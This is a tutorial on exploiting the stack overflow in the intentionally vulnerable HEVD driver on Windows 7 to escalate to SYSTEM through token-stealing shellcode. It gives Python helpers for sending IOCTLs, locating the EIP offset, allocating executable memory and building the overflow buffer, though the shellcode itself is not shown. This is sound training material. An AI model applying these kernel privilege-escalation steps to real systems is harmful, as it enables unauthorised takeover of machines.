Windows Kernel Exploitation Tutorial Part 2: Stack Overflow


Overview

In part 1, we looked at how to manually set up the environment for kernel debugging. If you want something more straightforward, have a look at this great writeup by hexblog on setting up VirtualKD for much faster debugging.

In this post, we'll dive deep into kernel space and work through our first stack overflow example by exploiting a driver.

A shoutout to hacksysteam for the vulnerable driver HEVD, and to fuzzySecurity for a really good writeup on the topic.


Setting up the driver

For this tutorial, we'll be exploiting the stack overflow module in the HEVD driver. Download the source from GitHub, then either build the driver yourself by following the steps on the GitHub page, or download the vulnerable version here and pick the build that matches your architecture (32-bit or 64-bit).

Then load the driver in the debuggee VM using the OSR Loader, as shown below:

OSR

Check that the driver has loaded successfully in the debuggee VM.

There’s also a .pdb symbol file included with the driver, which you can use as well.

Once the driver is successfully loaded, we can now proceed to analyze the vulnerability.


Analysis

If we look at the StackOverflow.c file in the driver source, we see that hacksysteam has done a really good job of demonstrating both the vulnerable and the secure version of the code.

In the insecure version, RtlCopyMemory() takes the user-supplied size directly, without validating it, whereas in the secure version the size is limited to the size of the kernel buffer. This missing check is what lets us overflow the stack buffer.

Let's analyze the driver in IDA Pro to understand how and where the stack overflow module is triggered:

ida1

From the flow, let’s analyze the IrpDeviceIoCtlHandler call.

ida2

We see that if the IOCTL is 0x222003, execution jumps to the StackOverflow module. Now that we know how to reach the stack overflow module, let's look at the TriggerStackOverflow function.

Ida3

The important thing to note here is the length defined for KernelBuffer: 0x800 (2048) bytes.
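As a side note on the IOCTL value seen in IrpDeviceIoCtlHandler: Windows IOCTL codes are packed bit fields, built in C with the CTL_CODE macro. The sketch below reimplements that packing in Python and decodes 0x222003. The helper names ctl_code and decode_ioctl are my own, not something from the driver. Note that the function number it decodes happens to be 0x800 as well, which is unrelated to the KernelBuffer length.

```python
# Bit layout of a Windows IOCTL code (same as the CTL_CODE macro):
#   device type: bits 16-31, access: bits 14-15,
#   function:    bits 2-13,  method: bits 0-1
FILE_DEVICE_UNKNOWN = 0x22
FILE_ANY_ACCESS = 0
METHOD_BUFFERED = 0
METHOD_IN_DIRECT = 1
METHOD_OUT_DIRECT = 2
METHOD_NEITHER = 3


def ctl_code(device_type, function, method, access):
    """Pack the four fields into a 32-bit IOCTL code."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code):
    """Split a 32-bit IOCTL code back into its fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


if __name__ == "__main__":
    fields = decode_ioctl(0x222003)
    print({name: hex(value) for name, value in fields.items()})
```

The method field decodes to METHOD_NEITHER, which means the I/O manager hands the driver the raw user-mode buffer pointer and length, so any validation is left entirely to the driver.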


Exploitation

Now that we have all the relevant information, let's start building our exploit. I'll be using DeviceIoControl() to interact with the driver, and Python to build our exploit.

Let's fire up WinDbg on the debugger machine, set a breakpoint on the TriggerStackOverflow function, and analyze the behavior when we send data of length 0x800 (2048).
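For reference, here is a minimal sketch of how the DeviceIoControl() call can be made from Python with ctypes. It is not the exact script from the screenshots in this post. The send_ioctl helper is my own naming, it is written for Python 3, and it only runs on Windows. The device path in the usage comment is an assumption (it is the symbolic link name HEVD commonly registers), so verify it against your build.

```python
import ctypes

GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
# INVALID_HANDLE_VALUE is (HANDLE)-1; its width depends on the platform.
INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value


def send_ioctl(device_path, ioctl_code, data):
    """Open the device and send `data` as the IOCTL input buffer (Windows only)."""
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.CreateFileW.restype = ctypes.c_void_p
    kernel32.CreateFileW.argtypes = [
        ctypes.c_wchar_p, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_void_p,
        ctypes.c_uint32, ctypes.c_uint32, ctypes.c_void_p,
    ]
    kernel32.DeviceIoControl.restype = ctypes.c_int
    kernel32.DeviceIoControl.argtypes = [
        ctypes.c_void_p, ctypes.c_uint32, ctypes.c_void_p, ctypes.c_uint32,
        ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_uint32),
        ctypes.c_void_p,
    ]
    kernel32.CloseHandle.argtypes = [ctypes.c_void_p]

    handle = kernel32.CreateFileW(
        device_path, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None
    )
    if handle is None or handle == INVALID_HANDLE_VALUE:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        in_buf = ctypes.create_string_buffer(data, len(data))
        bytes_returned = ctypes.c_uint32(0)
        ok = kernel32.DeviceIoControl(
            handle, ioctl_code, in_buf, len(data), None, 0,
            ctypes.byref(bytes_returned), None,
        )
        return bool(ok)
    finally:
        kernel32.CloseHandle(handle)


# Hypothetical usage inside the debuggee VM (device path is an assumption):
# send_ioctl(r"\\.\HackSysExtremeVulnerableDriver", 0x222003, b"A" * 0x800)
```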

Windbg1

We see that although our breakpoint is hit, no overflow or crash occurred. Let's increase the buffer size to 0x900 (2304) and analyze the output.

Windbg2

Bingo, we get a crash, and we can clearly see that it’s a vanilla EIP overwrite, and we are able to overwrite EBP as well.
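To see why 0x800 bytes are harmless while 0x900 bytes crash, here is a toy model of the stack frame in Python. It is only an illustration, not the real layout. The placeholder values, the `gap` between the buffer and the saved registers, and the function names are all assumptions of mine. The real distance to the return address is what the pattern scripts measure.

```python
import struct

BUFFER_SIZE = 0x800            # length of KernelBuffer from the analysis
SAVED_EBP = 0x11111111         # placeholder value, not a real address
RETURN_ADDRESS = 0x22222222    # placeholder value, not a real address


def make_frame(gap=0):
    """Toy frame: [KernelBuffer][gap][saved EBP][return address][rest of stack]."""
    frame = bytearray(BUFFER_SIZE + gap)
    frame += struct.pack("<II", SAVED_EBP, RETURN_ADDRESS)
    frame += bytearray(0x200)  # room above the frame so the model never grows
    return frame


def unchecked_copy(frame, data):
    """Models the insecure path: the length comes from the caller."""
    frame[0:len(data)] = data


def checked_copy(frame, data):
    """Models the secure path: the length is capped at the buffer size."""
    n = min(len(data), BUFFER_SIZE)
    frame[0:n] = data[:n]


def saved_values(frame, gap=0):
    """Return (saved EBP, return address) as currently stored in the frame."""
    return struct.unpack_from("<II", frame, BUFFER_SIZE + gap)


if __name__ == "__main__":
    frame = make_frame()
    unchecked_copy(frame, b"A" * 0x800)
    print([hex(v) for v in saved_values(frame)])   # saved values intact
    unchecked_copy(frame, b"A" * 0x900)
    print([hex(v) for v in saved_values(frame)])   # both overwritten with 0x41414141
```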

Using Metasploit's classic pattern_create and pattern_offset scripts, we can easily figure out the offset for EIP. After adjusting for the offset, the script looks like:

windbg3
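If you don't have Metasploit at hand, the same idea is easy to sketch in Python. The two functions below are my own reimplementation of the upper/lower/digit cyclic pattern, not the Metasploit scripts themselves. pattern_offset takes the EIP value as WinDbg displays it, which is the little-endian interpretation of four pattern bytes.

```python
import string
import struct
from itertools import product

# 26 * 26 * 10 three-character groups; every 4-byte window is unique.
MAX_PATTERN_LENGTH = 26 * 26 * 10 * 3


def pattern_create(length):
    """Return `length` bytes of the cyclic pattern Aa0Aa1Aa2..."""
    if length > MAX_PATTERN_LENGTH:
        raise ValueError("pattern would repeat beyond %d bytes" % MAX_PATTERN_LENGTH)
    groups = []
    for upper, lower, digit in product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    ):
        if 3 * len(groups) >= length:
            break
        groups.append(upper + lower + digit)
    return "".join(groups)[:length].encode("ascii")


def pattern_offset(register_value, length=MAX_PATTERN_LENGTH):
    """Return the offset of a 32-bit register value in the pattern, or -1."""
    needle = struct.pack("<I", register_value)
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(20))
    # Replace the value below with the EIP shown in WinDbg after the crash.
    print(pattern_offset(0x41306141))
```

Send pattern_create(0x900) as the input buffer, read EIP from the crash, and pass it to pattern_offset to get the number of filler bytes that must precede the new return address.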

Now that we control EIP and have execution in kernel space, let's proceed with writing our payload.

Because of DEP, we can't just execute instructions that we pass directly onto the stack, apart from return instructions. There are several methods to bypass DEP, but for simplicity I'll be using VirtualAlloc() to allocate a new block of executable memory and copy our shellcode into it. This works because the IOCTL handler runs in the context of our calling process, so the kernel can reach this user-mode allocation, and Windows 7 has no SMEP to stop the kernel from executing user-mode pages.

For our shellcode, I'll be using the sample token-stealing payload provided by hacksysteam in their payloads.c file.
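A rough sketch of this step in Python with ctypes follows. It is an illustration under a few assumptions: alloc_executable and build_overflow are hypothetical helper names of mine, the offset argument is whatever value you measured with the pattern scripts, and the allocation part only runs on Windows.

```python
import ctypes
import struct

MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40


def alloc_executable(payload):
    """Copy `payload` into a fresh RWX user-mode allocation (Windows only)."""
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.VirtualAlloc.restype = ctypes.c_void_p
    kernel32.VirtualAlloc.argtypes = [
        ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_uint32,
    ]
    address = kernel32.VirtualAlloc(
        None, len(payload), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE
    )
    if not address:
        raise ctypes.WinError(ctypes.get_last_error())
    ctypes.memmove(address, payload, len(payload))
    return address


def build_overflow(offset, return_address):
    """Filler up to the saved return address, then the 32-bit address to jump to."""
    return b"A" * offset + struct.pack("<I", return_address)


# Hypothetical usage on the 32-bit debuggee, with `offset` measured earlier
# and `shellcode` holding the payload bytes:
# buffer = build_overflow(offset, alloc_executable(shellcode))
```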

Basically, this shellcode saves the register state, finds the current process's token and saves it, then finds the SYSTEM process by its pid, extracts the SYSTEM process token, replaces the current process's token with the SYSTEM process token, and restores the registers. As the SYSTEM process has pid 4 on Windows 7, the shellcode can be written as:

But we soon hit a problem here during execution:

Windbg4

We see that our recovery mechanism is flawed: although our shellcode is in memory and executing, the application isn't able to resume its normal operation afterwards. So we need to modify the shellcode and add the instructions that we overwrote, which should help the driver resume its normal execution flow. Let's analyze the normal behaviour of the application, without the shellcode.

Windbg5

We see that we just need to add pop ebp and ret 8 after our shellcode has executed so that the driver can recover. The final shellcode, after this, becomes:

And W00tW00t, we get nt authority\system privileges, successfully exploiting our vulnerability.

system

7 thoughts on “Windows Kernel Exploitation Tutorial Part 2: Stack Overflow”

  1. Spot on with this write-up, I truly feel this site needs a great deal more attention. I’ll probably be returning to read through more, thanks for the advice!

  2. Thank you for your article. I have a little question.

    You are allocating memory with VirtualAlloc in the address space of your Python process, but how is it accessed from kernel mode? As I understand it, this memory only exists in your process's virtual memory. Does the kernel driver attach to the process that called the IOCTL, or what?

    Thanks.
